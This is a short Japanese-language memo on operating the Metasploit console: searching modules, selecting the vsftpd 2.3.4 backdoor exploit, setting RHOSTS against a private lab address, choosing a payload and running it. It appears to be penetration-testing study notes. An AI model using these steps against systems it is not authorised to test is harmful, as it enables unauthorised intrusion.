msfconsole使用方法

1、起動
　msfconsole

2、exploit 検索
　search metasploit -> 全検索
　search キーワード -> キーワードに関連する検索
　　例）search ssh
　　　　search ftp
　オプションで、type , platform がある（きっとほかにもある）
　　search type:payload shell_bind platform:linux
　　詳しくは"search.txt"
　　これ使える！
　　　search name:ツールの名前 | grep 攻撃方法
　　　例）search name:irc | grep backdoor
　　　　　search name:samba | grep traversal

3、exploit 指定
　use exploitPAHT
　　例）use exploit/unix/ftp/vsftpd_234_backdoor
　　　　searchでPATHが出る

4、option確認
　show options
　　vsftpd_234_backdoorの場合
------------------------------------------------------------------------------
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic
------------------------------------------------------------------------------
上記の例では、RHOSTSを設定してやる
　※Exploit target:は、現在設定されているtarget
　　なので、targetを変更するには
　　　show target コマンドでIDとNameを確認して
　　　set target 'ID'　でtargetをセットする（'ID'の部分は数字が入る　set target 2 とか）

5、option設定
　set RHOSTS [host]
　　例）set RHOSTS 192.168.56.103
　　　　set RPORT * -> とすればポートも変更できる
　オプションにはないが、payloadもセットできるみたい（webサーバーのみ？）
　　set payload パス　-> でセットしたpayloadがデプロイされる

6、実行
　run
  or
　exploit


